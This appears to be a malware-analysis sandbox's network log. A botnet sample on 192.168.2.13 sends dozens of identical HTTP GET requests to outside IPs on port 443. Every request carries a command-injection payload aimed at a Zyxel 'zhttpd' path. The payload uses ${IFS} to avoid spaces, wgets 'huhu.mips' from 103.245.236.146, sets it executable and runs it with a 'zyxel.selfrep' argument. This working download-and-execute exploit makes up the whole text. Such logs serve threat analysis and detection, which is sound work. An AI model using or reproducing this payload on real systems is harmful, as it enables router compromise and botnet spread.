                                                  Jan 19, 2024 18:24:06.260519981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6890192.168.2.135048248.17.153.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260562897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6891192.168.2.133800260.74.244.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260611057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6892192.168.2.1355656179.213.72.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260637045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6893192.168.2.13338221.47.103.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260687113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6894192.168.2.1350042188.232.62.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260725975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6895192.168.2.1339530176.25.63.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260768890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6896192.168.2.1341532110.68.122.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260819912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6897192.168.2.134052891.205.174.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260858059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6898192.168.2.1334326170.232.226.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260900021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6899192.168.2.1360146112.199.192.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260936022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6900192.168.2.1348670176.114.118.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260962009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6901192.168.2.1341134145.146.142.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261010885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6902192.168.2.135113290.207.131.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261054993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6903192.168.2.1333630167.212.247.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261092901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6904192.168.2.1340670158.178.3.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261123896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6905192.168.2.135846212.68.60.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261179924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6906192.168.2.134008475.72.123.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261217117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6907192.168.2.135545238.20.77.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261243105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6908192.168.2.135205820.3.65.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261307955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6909192.168.2.1356472140.221.240.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261324883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6910192.168.2.1340848204.122.254.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261392117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6911192.168.2.135003247.197.25.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261394978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6912192.168.2.1338098220.89.39.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261437893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6913192.168.2.136073644.177.191.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261535883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6914192.168.2.1352812207.27.94.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261573076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6915192.168.2.134628451.252.91.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261636972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6916192.168.2.1355892124.245.175.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261657953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6917192.168.2.1357566122.71.1.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261709929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6918192.168.2.1342762152.159.104.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261750937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6919192.168.2.1358590184.185.145.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261802912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6920192.168.2.1358258173.145.136.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261853933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6921192.168.2.1338424217.17.75.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261904001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6922192.168.2.1350380125.113.159.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261924982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6923192.168.2.133898299.77.32.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261955023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6924192.168.2.1339400178.225.149.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.261986017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6925192.168.2.135228460.0.228.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262047052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6926192.168.2.13390562.188.207.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262084007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6927192.168.2.135694886.81.160.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262135029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6928192.168.2.1347578142.57.143.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262167931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6929192.168.2.133466042.56.115.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262213945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6930192.168.2.1357250139.143.128.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262255907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6931192.168.2.13609588.250.135.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262289047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6932192.168.2.1343498113.35.5.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262319088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6933192.168.2.133666040.127.16.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262367964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6934192.168.2.1346630131.108.176.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262392998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6935192.168.2.1337982158.18.44.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262445927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6936192.168.2.1346844137.183.70.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262476921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6937192.168.2.1360276113.219.200.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262526035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6938192.168.2.1336882185.7.38.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262581110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6939192.168.2.1348002156.234.24.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262624025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6940192.168.2.134970058.210.160.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262662888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6941192.168.2.1358018174.12.41.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262693882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6942192.168.2.1354282132.158.140.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262742043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6943192.168.2.133704054.233.57.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262785912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6944192.168.2.1346090133.102.9.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262851000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6945192.168.2.135014861.54.77.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262901068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6946192.168.2.1349832133.165.161.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262922049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6947192.168.2.1346484211.31.73.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.262969971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6948192.168.2.1358696178.101.141.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263012886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6949192.168.2.134942250.191.170.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263051987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6950192.168.2.135225092.211.158.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263096094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6951192.168.2.1334018202.234.104.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263130903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6952192.168.2.134555048.21.179.101443
                                                  TimestampBytes transferredDirectionData
